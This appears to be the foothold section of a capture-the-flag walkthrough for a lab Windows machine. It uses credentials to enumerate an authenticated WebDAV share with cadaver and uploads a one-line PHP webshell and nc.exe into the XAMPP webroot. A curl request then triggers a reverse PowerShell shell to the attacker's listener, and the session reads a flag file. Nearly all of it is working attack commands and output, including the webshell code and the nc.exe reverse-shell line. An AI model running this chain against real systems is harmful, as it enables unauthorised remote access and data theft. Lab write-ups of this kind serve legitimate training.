Foothold

adot:Pwned123!

Enumeration with cadaver (authenticated WebDAV on port 8000)

❯ cadaver
dav:!> open http://192.168.160.127:8000/fs/88dbf60667052595/
dav:/fs/88dbf60667052595/> cd ..
Authentication required for Web File Server on server `192.168.160.127':
Username: adot
Password:
dav:/fs/> ls
Listing collection `/fs/': succeeded.
Coll:   C                                      0  Dec 31  1969
Coll:   D                                      0  Dec 31  1969
dav:/fs/> cd C
dav:/fs/C/> ls
Listing collection `/fs/C/': succeeded.
Coll:   $Recycle.Bin                           0  Nov  3  2020
Coll:   $WinREAgent                            0  Dec  2  2021
Coll:   Documents and Settings                 0  Oct 16  2020
Coll:   FTP                                    0  Nov  3  2020
Coll:   PerfLogs                               0  Dec  7  2019
Coll:   Program Files (x86)                    0  Dec  2  2021
Coll:   Program Files                          0  Dec  2  2021
Coll:   ProgramData                            0  Dec  7  2021
Coll:   RailsInstaller                         0  Nov  3  2020
Coll:   Recovery                               0  Dec  2  2021
Coll:   Ruby26-x64                             0  Nov  3  2020
Coll:   Sites                                  0  Nov  3  2020
Coll:   System Volume Information              0  Oct 16  2020
Coll:   Users                                  0  Dec  2  2021
Coll:   Windows                                0  Apr  8  2022
Coll:   bd                                     0  Oct  8 07:29
Coll:   xampp                                  0  Oct 16  2020
        DumpStack.log.tmp                   8192  Aug  2 15:29
        output.txt                          2696  Oct  8 07:16
        pagefile.sys                   738197504  Aug  2 15:29
        swapfile.sys                   268435456  Aug  2 15:29
dav:/fs/C/>
Stage a PHP webshell and nc.exe locally, then upload them with cadaver into the XAMPP webroot (C:\xampp\htdocs is writable over WebDAV):

❯ echo test > test.txt
❯ echo "<?php echo shell_exec(\$_GET['cmd']); ?>" > cmd.php
dav:/fs/C/xampp/htdocs/> put nc.exe
Uploading nc.exe to `/fs/C/xampp/htdocs/nc.exe':
Progress: [=============================>] 100.0% of 59392 bytes succeeded.

cmd.php goes up the same way (the `put cmd.php` is not shown above). Apache serves htdocs on port 45332; hitting the webshell runs the uploaded nc.exe (a build that supports -e) back to the listener:

❯ curl http://192.168.160.127:45332/cmd.php\?cmd\=nc.exe+192.168.45.239+8000+-e+powershell.exe
❯ nc -lnvp 8000
listening on [any] 8000 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.160.127] 50608
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\xampp\htdocs> whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
whoami ; type C:\Users\Jerren\Desktop\local.txt ; ipconfig
medjed\jerren
e51dcad7ed48861988c2bd2337cdc9c3

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 192.168.160.127
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.160.254
